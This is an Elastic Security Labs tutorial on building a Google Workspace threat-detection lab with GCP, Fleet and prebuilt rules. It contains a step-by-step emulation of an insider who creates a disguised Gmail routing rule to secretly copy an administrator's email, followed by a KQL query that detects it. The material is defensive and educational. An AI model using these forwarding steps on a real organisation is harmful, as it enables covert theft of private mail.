<p>The process of setting this up is pretty straightforward. Note that your environment does not have to be cloud-focused; if you prefer to do everything locally, you are more than welcome to. The <a href="https://www.elastic.co/es/security-labs/the-elastic-container-project">Elastic Container Project</a> is a great resource for a local Docker build of the stack.</p>
<h2>Sign-Up for Google Workspace</h2>
<p>In order for you to use GW, you must have a registered Google account email address and organization. If you already have a GW setup for an organization, login to the <a href="https://admin.google.com/">admin console</a> and continue to Create a Project in Google Cloud. This process will not go into detail about creating a Google account.</p>
<p>Once created, do the following:</p>
<ol>
<li>Visit <a href="https://workspace.google.com">https://workspace.google.com</a> &gt; Get Started</li>
<li>Fill out the information requested in subsequent steps</li>
<li>Business name: DeJesus’ Archeology</li>
<li>Number of employees: 2-9</li>
<li>Region: United States</li>
</ol>
<p>For this lab, we will use DeJesus’ Archeology as a business name because it's memorable (also who didn't want to be an archeologist growing up?). We'll be digging up more recent evidence in these logs than we would from the earth, of course.</p>
<p>Eventually you will be asked, “Does your business have a domain?”. GW requires you to have your own domain name to use its services, especially the admin console for an organization. For today, we will select “No, I need one” and will use dejesusarcheology.com, but please select or use your own. From here, you will need to enter additional business information to register your domain and organization.</p>
<p>You will need a username to sign into your GW account and create your business email address. We'll use <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a> as the administrative email. When finished, continue to login to your GW admin console with your new email where you should be greeted by a similar interface below.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image25.jpg" alt="Default page for GW admin console after login" /></p>
<h2>Setup Google Cloud Platform (GCP)</h2>
<p>For the Elastic agent to ingest GW logs, it relies solely on making requests to the <a href="https://developers.google.com/admin-sdk/reports/reference/rest">Reports API</a> and therefore, we need to leverage GCP for a managed service account. This service account’s credentials will be used by our Elastic agent to then leverage the admin SDK API for pulling logs from GW’s Reports API into the Elastic Stack. Domain-wide delegation and OAuth2 are important for authentication and resource access but will be enabled through steps later on.</p>
<h3>Create a Project</h3>
<p>GCP is hierarchical, so we must first create a project. If you already have a GCP environment setup, we recommend creating a new project that links to your GW via the registered domain by following similar steps below.</p>
<p>Complete the following steps:</p>
<ol>
<li>Log into <a href="https://console.cloud.google.com/">Google Cloud</a>with the same Google account used to setup GW</li>
<li>Select the following: Select a project &gt; New Project</li>
<li>Enter the following information described in subsequent steps</li>
<li>Project name: dejesus-archeology</li>
<li>Organization: dejesusarcheology.com</li>
<li>Location: dejesusarcheology.com</li>
</ol>
<p>When done, you should have a new organization and project in GCP. By default, only the creator of the project has rights to manage the project.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image19.jpg" alt="Project dashboard in Google Cloud" /></p>
<h3>Enable Admin SDK API</h3>
<p>Our Elastic agent will eventually use our GCP service account, which uses the <a href="https://developers.google.com/admin-sdk">Workspace Admin SDK</a> to interact with the GW admin console REST API, therefore it needs to be enabled in GCP. To keep your mind at ease, we will only be enabling read access to the Reports API for this admin SDK.</p>
<p>Complete the following steps:</p>
<ul>
<li>Select the Google Cloud navigation menu &gt; APIs &amp; Services &gt; Enabled APIs &amp; Services</li>
<li>Search and enable “Admin SDK API” from the API library page</li>
</ul>
<p>When finished, you will have enabled the Admin SDK API within your project, where your service account will have access to pull data from GW.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image23.jpg" alt="Admin SDK API enabled in GCP" /></p>
<h3>Configure OAuth Consent Screen</h3>
<p>We next need to set up the <a href="https://developers.google.com/workspace/guides/configure-oauth-consent">OAuth consent screen</a> for our service account and application when they create API requests to GW, as it will include the necessary authorization token.</p>
<p>Complete the following steps:</p>
<ol>
<li>Select the Google Cloud navigation menu &gt; APIs &amp; Services &gt; Enabled APIs &amp; Services &gt; OAuth Consent Screen</li>
<li>User Type &gt; Internal &gt; Create</li>
<li>Fill out the following information in subsequent steps</li>
<li>App name: elastic-agent</li>
<li>User support email: <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a></li>
<li>Authorized domains: dejesusarcheology.com</li>
<li>Developer contact information: <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a></li>
<li>Save and Continue</li>
<li>Save and Continue</li>
<li>Back to Dashboard</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image7.jpg" alt="OAuth consent screen setup for application in GCP" /></p>
<p>When finished, we will now have a registered application using OAuth 2.0 for authorization and the consent screen information set. Please note, the default token request limit for this app daily is 10,000 but can be increased. We recommend setting your Elastic agent’s pull rate to every 10 minutes which should not come close to this reaching this threshold. Setting the agent’s pull rate will be done at a later step.</p>
<h3>Create a Service Account</h3>
<p>For the Elastic agent to ingest data from GW, we will need to create a <a href="https://cloud.google.com/iam/docs/service-accounts">service account</a> for the agent to use. This account is meant for non-human applications, allowing it to access resources in GW via the Admin SDK API we enabled earlier.</p>
<p>To create a service account, do the following:</p>
<ol>
<li>Select the navigation menu in Google Cloud &gt; APIs &amp; Services &gt; Credentials &gt; Create Credentials &gt; Service Account</li>
<li>Enter the following information:</li>
<li>Service account name: elastic-agent</li>
<li>Service account ID: elastic-agent</li>
<li>Leave the rest blank and continue</li>
<li>Select your new Service Account &gt; Keys &gt; Add Key &gt; Create New Key &gt; JSON</li>
</ol>
<p>By default, the Owner role will be applied to this service account based on inheritance from the project, feel free to scope permissions tighter as best seen fit. When finished, you should have a service account named elastic-agent, credentials for this service account in a JSON file saved to your host. We will enter this information during our Fleet policy integration setup.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image8.jpg" alt="Service account creation in GCP" /></p>
<h3>Enable Domain-Wide Delegation</h3>
<p>Our service account will need <a href="https://developers.google.com/admin-sdk/directory/v1/guides/delegation">domain-wide delegation</a> of permissions to access APIs that reach outside of GCP and into GW. The important data necessary for this has already been established in earlier steps where we need an API key, service account and OAuth client ID.</p>
<p>To enable domain-wide delegation for your service account, do the following:</p>
<ol>
<li>In your GW Admin Console select &gt; Navigation Menu &gt; Security &gt; Access and data control &gt; API controls</li>
<li>Select Manage Domain Wide Delegation &gt; Add New</li>
<li>Client ID: OAuth ID from Service Account in GCP</li>
<li>Google Cloud Console &gt; IAM &amp; Admin &gt; Service Accounts &gt; OAuth 2 Client ID (copy to clipboard)</li>
<li>OAuth Scopes: <a href="https://www.googleapis.com/auth/admin.reports.audit.readonly">https://www.googleapis.com/auth/admin.reports.audit.readonly</a></li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image4.jpg" alt="Domain-wide Delegation enabled in Google Workspace" /></p>
<p>Our service account in GCP only needs access to admin.reports.audit.readonly to access GW <a href="https://developers.google.com/admin-sdk/reports/v1/get-start/overview">Audit Reports</a> where these are converted into ECS documents for our Elastic Stack.</p>
<p>If you made it this far, CONGRATULATIONS you are doing outstanding! Your GW and GCP environments are now set up and finished. At this point you are almost done, we just need to set up the Elastic Stack.</p>
<h2>Setting Up Your Free Cloud Stack</h2>
<p>For this lab, we will use a <a href="https://cloud.elastic.co/registration">free trial</a>of cloud elastic with your preference of a Google or Microsoft email account. You also have the option to create the stack in <a href="https://www.elastic.co/es/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&amp;utm_content=Elasticsearch-AWS&amp;utm_source=adwords-s&amp;utm_medium=paid&amp;device=c&amp;utm_term=amazon%20elk&amp;gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB">Amazon Web Services</a> (AWS), <a href="https://www.elastic.co/es/guide/en/cloud/current/ec-billing-gcp.html">GCP</a> or <a href="https://www.elastic.co/es/partners/microsoft-azure">Microsoft Azure</a> if you’d like to stand up your stack in an existing Cloud Service Provider (CSP). The free trial will deploy the stack to GCP.</p>
<p>Once registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment gw-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment and we recommend the latest version for all the latest features. For the purposes of this demo, we use the following:</p>
<ul>
<li>Name: gw-threat-detection</li>
<li>Cloud provider: Google Cloud</li>
<li>Region: Iowa (us-central1)</li>
<li>Hardware profile: Storage optimized</li>
<li>Version: 8.4.1 (latest)</li>
</ul>
<p>Once set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP where your deployment credentials will be displayed. You can download these credentials as a CSV file or save them wherever you best see fit, but they are crucial to logging into your deployed stack. The deployment takes approximately ~5 minutes to complete and once finished you can select “continue” to login. Congratulations, you have successfully deployed the Elastic Stack within minutes!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image9.jpg" alt="Default page after logging into deployed Elastic Stack" /></p>
<h2>Setup Fleet from the Security Solution</h2>
<p>As a reminder, <a href="https://www.elastic.co/es/guide/en/fleet/current/fleet-overview.html">Fleet</a> enables the creation of a security policy, which can incorporate the <a href="https://www.elastic.co/es/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html">GW integration</a>on an elastic-agent, in order to access and ingest GW logs into our stack.</p>
<h3>Create a Google Workspace Policy</h3>
<p>In order for our Elastic Agent to know which integration it is using, what data to gather and where to stream that data within our stack, we must first set up a custom Fleet policy, named Google Workspace.</p>
<p>To setup a fleet policy within your Elastic Stack, do the following in your Elastic Stack:</p>
<ul>
<li>Navigation menu &gt; Management &gt; Fleet &gt; Agent Policies &gt; Create agent policy</li>
<li>Enter “Google Workspace” as a name &gt; Create Agent Policy</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image6.jpg" alt="Fleet agent policies page in Elastic Stack" /></p>
<h3>Install the Elastic agent on an Endpoint</h3>
<p>As previously mentioned, we have to install at least one agent on an endpoint to access data in GW, and will be subject to the deployed GW policy. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP to keep everything in the same environment. I will be using a VM instance of <a href="https://releases.ubuntu.com/focal/">Ubuntu 20.04 LTS</a> VM in Google’s Compute Engine (GCE) of the same GCP project we have been working on. Your endpoint can be lightweight, such as GCP N1 or E2 series, as its sole purpose is to run the Elastic agent.</p>
<p>After your endpoint is setup, do the following in your Elastic Stack to deploy your the agent:</p>
<ol>
<li>Navigation menu &gt; Management &gt; Fleet &gt; Agents &gt; Add Agent</li>
<li>Ensure the GW policy is selected</li>
<li>Select the appropriate OS</li>
<li>Select the clipboard icon to copy the commands</li>
<li>Run the commands on your endpoint to install the agent</li>
<li>Once finished, Fleet should show a checkmark and state 1 agent has been enrolled and Incoming data confirmed</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image24.png" alt="Installed Elastic agent on Linux endpoint and Fleet status page in Elastic Stack" /></p>
<h3>Assign Google Workspace Integration to Fleet Policy</h3>
<p>We must add the GW integration to our GW policy in order for it to collect data from GW and stream it to our Elastic Stack. We will configure the GW integration settings to have information created when we set up our GW environment to avoid having <a href="https://attack.mitre.org/techniques/T1552/">unsecured credentials</a> on our Ubuntu host.</p>
<p>⚠️ The GW integration has a default interval of 2 hours, meaning the Elastic agent will retrieve data every 2 hours due to potential <a href="https://support.google.com/a/answer/7061566?hl=en">data retention and lag times</a>. This should be adjusted in the integration itself and is accounted for in the following steps within your Elastic Stack:</p>
<ol>
<li>Navigation menu &gt; Fleet &gt; Agent Policies &gt; Google Workspace &gt; Add Integration</li>
<li>Search for “Google Workspace” &gt; Select Google Workspace</li>
<li>Select “Add Google Workspace”</li>
<li>Enter the following information for this integration:</li>
<li>Integration name: google workspace</li>
<li>Jwt File: Copy contents of JSON file from service account creation steps</li>
<li>Delegated Account: <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a> (Use your own)</li>
<li>Interval: 10m</li>
<li>Agent policy: Google Workspace</li>
<li>Select “Save and Continue”</li>
<li>Select “Save and deploy changes”</li>
</ol>
<p>Once completed, your GW integration should be assigned to your GW policy with one agent assigned this policy.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image18.jpg" alt="Google Workspace integration enabled in Fleet policy in Elastic Stack" /></p>
<p>To recap on our Elastic Stack setup so far we have completed the following:</p>
<ul>
<li>Deployed an Elastic Stack</li>
<li>Created a Fleet policy</li>
<li>Setup a lightweight Linux endpoint</li>
<li>Deployed an Elastic agent to the Linux endpoint</li>
<li>Enabled the Google Workspace integration inside our Fleet policy</li>
</ul>
<h3>Assign Google Workspace Integration to Fleet Policy</h3>
<p>Rather than rely on the detection engineering (DE) higher powers, let’s take a second to actually confirm GW data is being ingested into our stack as expected at this point. We can rely on the Discovery feature of the Elastic Stack which allows us to search specific criteria across existing ECS documents. For this, we will use the filter criteria <code>data_stream.dataset : &quot;google_workspace.*&quot;</code> to look for any ECS documents that originate from a Google Workspace datastream.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image1.png" alt="Search results for Google Workspace ECS documents in Elastic Stack via Discover" /></p>
<p>If you do not have any results, generate some activity within your GW such as creating new users, enabling email routes, creating new Organizational Units (OU) and so forth, then refresh this query after the 10 minute window has surpassed.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image5.gif" alt="" /></p>
<p>If results are found, congratulations are in order because you now have a fully functional threat detection lab for Google Workspace with the Elastic Security for SIEM!</p>
<h2>Enable Google Workspace Detection Rules</h2>
<p>As stated earlier, Elastic has 600+ pre-built detection <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/google_workspace">rules</a> not only for Windows, Linux and MacOS endpoints, as well as several integrations including GW. You can view our current existing GW rules and MITRE ATT&amp;CK <a href="https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-google_workspaceWILDCARD.json&amp;leave_site_dialog=false&amp;tabs=false">coverage</a>.</p>
<p>To enable GW rules, complete the following in the Elastic Stack:</p>
<ol>
<li>Navigation menu &gt; Security &gt; Manage &gt; Rules</li>
<li>Select “Load Elastic prebuilt rules and timeline templates”</li>
<li>Once all rules are loaded:</li>
<li>Select “Tags” dropdown</li>
<li>Search “Google Workspace”</li>
<li>Select all rules &gt; Build actions dropdown &gt; Enable</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image21.png" alt="Enabled pre-built detection rules where tag is Google Workspace in Elastic Stack" /></p>
<p>While we won’t go in-depth about exploring all rule information, we recommend doing so. Elastic has some additional information such as related integrations, investigation guides and more! Also, you can contribute back to the community by <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html">creating your own detection rule</a> with the “Create new rule” button, and <a href="https://github.com/elastic/detection-rules#how-to-contribute">contribute</a> to our detection rules repository.</p>
<h2>Let’s Trigger a Pre-Built Rule</h2>
<p>For this example, we will provoke the <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml">Google Workspace Custom Admin Role Created</a> detection rule. In our GW admin console, visit Account &gt; Admin roles and create a new role with the following information:</p>
<ol>
<li>Name: Curator</li>
<li>Description: Your Choice</li>
<li>Admin console privileges:</li>
<li>Alert Center: Full Access</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image16.jpg" alt="Create an admin role in Google Workspace admin console" /></p>
<p>Now, we aren’t entirely sure why the Curator role would have access to our Alert Center, but the role seems either improperly scoped or someone wants to have the ability to potentially silence some alerts before our security team can investigate them. While the creation of administrative accounts (<a href="https://attack.mitre.org/techniques/T1136/003/">T1136.003</a>) is not unusual, they should always be investigated if unexpected to ensure cloud roles (<a href="https://attack.mitre.org/techniques/T1098/003/">T1098.003</a>) are properly scoped.</p>
<p>To view our detection alert, in your Elastic Stack, visit Navigation Menu &gt; Security &gt; Alerts and the following should show your alerts. From this, we can see that our rule triggered as well as <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.toml">Google Workspace API Access Granted via Domain-Wide Delegation of Authority</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image26.jpg" alt="Elastic Stack security alerts page displaying triggered alerts" /></p>
<p>If we select “View details” from the actions column, we receive a pop-out panel showing the alert overview, tabled data fields and values from our ECS document, as well as the raw JSON.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image3.png" alt="ECS document with tabled data view from Elastic Stack security alerts" /></p>
<p>Most detection rules for GW can be developed with a few consistent fields such as those we describe in our <a href="https://www.elastic.co/es/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html">documentation</a>, making new rules easier to create. If you would like to view all data fields for GW that the ECS schema contains, you can find that information <a href="https://www.elastic.co/es/guide/en/beats/filebeat/current/exported-fields-google_workspace.html">here</a>.</p>
<h2>Let’s Trigger a Custom Rule</h2>
<p>While pre-built detection rules are great for having threat coverage during onboarding, maybe you would like to search your data and create a new custom rule tailored to your environment.</p>
<p>Since the Elastic Stack is bundled with additional searching capabilities, we can rely on the Analytics <a href="https://www.elastic.co/es/guide/en/kibana/current/discover.html">Discover</a> feature to start searching through our raw data for GW related documents by visiting Navigation Menu &gt; Analytics &gt; Discover.</p>
<p>From here, we can change our data view to logs-* and then do an open-ended KQL query for <code>event.dataset: google_workspace*</code> which will return all documents where the source is from GW. You can then either start tabling the data based on available fields or view details about each document.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image2.png" alt="Google Workspace ECS documents search in Discover in Elastic Stack" /></p>
<p>This is important to understand because it influences rule development. Rules are often prototyped as a data reduction exercise, beginning very broad and being refined over time into an effective rule. If you are having difficulty after this exercise with creating detection logic, our <a href="https://github.com/elastic/detection-rules/blob/main/PHILOSOPHY.md">philosophy</a> on doing so may be of assistance.</p>
<p>First, we will add a user, Ray Arnold, to our organization who has administrative access. With our Ray Arnold account, we will generate some suspicious events in GW, such as creating a custom email route for Gmail that forwards email destined to our primary administrator (Terrance), to Ray Arnold. In this scenario we are focused on potential collection of sensitive information via email collection via an email forwarding rule (<a href="https://attack.mitre.org/techniques/T1114/003/">T1114.003</a>)</p>
<p>Complete the following steps:</p>
<ol>
<li>Add Ray Arnold as a user:</li>
<li>Navigate to the users settings in GW</li>
<li>Select “add new user”</li>
<li>First name: Ray</li>
<li>Last name: Arnold</li>
<li>Select “ADD NEW USER”</li>
<li>Add Engineers group and make Ray Arnold the owner:</li>
<li>Navigate to groups settings in GW</li>
</ol>
<p>You can configure the following settings like these examples:</p>
<ol>
<li>Group name: Engineers</li>
<li>Group email: <a href="mailto:engineering@dejesusarcheology.com">engineering@dejesusarcheology.com</a></li>
<li>Group Description: Engineering group at dinosaur park who are responsible for technology and feeding velociraptors.</li>
<li>Group owners: <a href="mailto:ray@dejesusarcheology.com">ray@dejesusarcheology.com</a></li>
<li>Labels: Mailing and Security</li>
<li>Who can join the group: Only invited users</li>
<li>Select “Create Group”</li>
</ol>
<p>Now we assign admin roles and privileges to Ray Arnold: 1. Navigate to Ray Arnold’s user account 2. Select “Admin roles and privileges” &gt; Assign Roles 3. Super Admin -&gt; Assigned 4. Groups Admin -&gt; Assigned 5. Services Admin -&gt; Assigned 6. Select “Save”</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image12.jpg" alt="Ray Arnold user created in Google Workspace with admin privileges" /></p>
<p>If done correctly, Ray Arnold should be a new user in GW for the DeJesus’ Archeology organization. He is also the owner of the Engineers group and has Super Admin, Groups Admin and Services Admin roles assigned to his account. Following this, we need to login to the GW admin console with Ray Arnold’s account and add a custom email route.</p>
<p>This provides our organization with an insider threat scenario. Ray Arnold was hired as an employee with authorization and authentication to GW admin console settings. Our organization trusts that Ray Arnold will receive compensation for the requirements agreed to during the hiring process. Risk-mitigation is then up to the administrator when scoping the proper permissions and roles applied to Ray Arnold.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image13.png" alt="Simple overview of insider threat via email collection by forwarding rule in Google Workspace" /></p>
<p>Complete the following:</p>
<ol>
<li>Login to the admin console with Ray Arnold’s account</li>
<li>Select Navigation Menu &gt; Apps &gt; Google Workspace &gt; Gmail &gt; Routing</li>
<li>Select Configure for “Routing”</li>
<li>Enter the following information</li>
<li>Description: Default administrator spam filtering</li>
<li>Email messages to affect: Inbound, Outbound, Internal - Sending, Internal - Receiving</li>
<li>Also deliver to: <a href="mailto:ray@dejesusarcheology.com">ray@dejesusarcheology.com</a></li>
<li>Account types to affect: Users</li>
<li>Envelope filter: Only affect specific envelope recipients (Email address: <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a>)</li>
</ol>
<p>Now we can test our custom email route by sending <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a> an email from a separate email (We created a random email account with Proton), that is private and discusses private details about new Paleo-DNA. Once you send an email, you can view Ray Arnold’s Gmail and see that this private email was additionally routed to <a href="mailto:ray@dejesusarcheology.com">ray@dejesusarcheology.com</a>, where we now have an existing insider threat potentially selling private information about our Paleo-DNA tests to competitors. This we cannot allow!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image11.gif" alt="" /></p>
<h3>Identify a Potential Detection Rule for Custom Gmail Routes</h3>
<p>Luckily, we have the Elastic Stack on our side to help us thwart this potential insider threat by detecting custom Gmail route creations! Within your Elastic Stack, visit Navigation Menu &gt; Analytics &gt; Discover and let’s start creating our KQL query. Below are the query filters we should be looking for and the final query.</p>
<p>KQL query:<code>event.dataset: google_workspace.admin and event.action: &quot;CREATE_GMAIL_SETTING&quot; and not related.user: terrance and google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)</code></p>
<p>Let’s break this down further to explain what we are looking for:</p>
<p><code>event.dataset: google_workspace.admin</code> - Documents in ECS where the data sourced from GW, specifically admin reporting. Since a user needs to be an administrator, we should expect data to source from admin reporting, which may also indicate a compromised admin account or abuse of an admin not setup with principle of least-privilege (PoLP).</p>
<p><code>event.action: &quot;CREATE_GMAIL_SETTING&quot;</code> - The creation of a Gmail setting which is typically done by administrators.</p>
<p><code>not related.user: terrance</code> - So far, any creation of a Gmail setting by an administrator whose username is not “terrance” who is the only administrator that is expected to be touching such settings.</p>
<p><code>google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)</code> - This setting name is specific to Gmail routing rules.</p>
<p>Plugging this query into Discover, we have matching documents for this activity being reported in GW!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image10.png" alt="Custom query search in Elastic Stack Discover for email forwarding rule creation" /></p>
<h3>Create a Custom Rule in the Security Feature</h3>
<p>Let’s wrap this up by adding our custom detection rule for this!</p>
<p>To add your custom rule, complete the following:</p>
<ol>
<li>In your Elastic Stack, select Navigation menu &gt; Security &gt; Manage &gt; Rules</li>
<li>Select “Create new rule”</li>
<li>Enter the following information:</li>
<li>Define rule: Source, Index Patterns: logs-google_workspace*</li>
<li>Custom query: Our custom query</li>
</ol>
<p>And we define rule metadata:</p>
<ol>
<li>Name: Google Workspace Custom Forwarding Email Route Created</li>
<li>Description: Your choice</li>
<li>Default severity: High</li>
<li>Tags: Google Workspace</li>
</ol>
<p>What is fantastic about this custom rule is we can send a notification via our platform of choice so we are notified immediately when this alert is triggered.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image17.jpg" alt="Security alert action for custom rule" /></p>
<p>Then select “Create &amp; enable rule” at the bottom to create your custom rule. If we replay the steps above to create a custom Gmail forwarding rule, we will now see an alert and receive a notification about the alert trigger!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image15.png" alt="Security alert for new custom detection rule in Elastic Stack" /></p>
<p>At this point, we are now aware that Ray Arnold has created a custom Gmail route rule in GW with no authorization. From our alert in the Elastic Stack and notification to the CEO, we can now take action to mitigate further risk.</p>
<h2>Takeaways</h2>
<p>As demonstrated, Elastic’s security solution and the Elastic Stack allow us to ingest GW reporting logs and scan this data with pre-built detection rules or custom rules. Combine this with other features of the stack such as <a href="https://www.elastic.co/es/enterprise-search">Enterprise Search</a>, <a href="https://www.elastic.co/es/observability">Observability</a>, and a very simple cloud stack deployment process and we can start detecting threats in our GW environment in no time.</p>
<p>It’s been quite a journey and you have accomplished an incredible amount of work. In part three of this series: Detecting Common Threats, we will emulate some common Google Workspace abuse by threat actors and create more advanced detection logic for these. Hold on tight, because it's about to get WILD.</p>
<p>Also, there is still so much more to explore within the Elastic Stack, as you have probably already found during this lab, so feel free to explore! Elastic continues to take action on security transparency as <a href="https://www.elastic.co/es/blog/continued-leadership-in-open-and-transparent-security">recently</a> discussed.</p>
<p>Hopefully this provides you with a better understanding of the powerful capabilities within the Elastic Stack and how to use it to detect potential threats in GW. Thanks for reading/following along and may we all be in the capable hands of detection engineers in part three.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/photo-edited-01-e.jpg" length="0" type="image/jpg"/>
        </item>
    </channel>
</rss>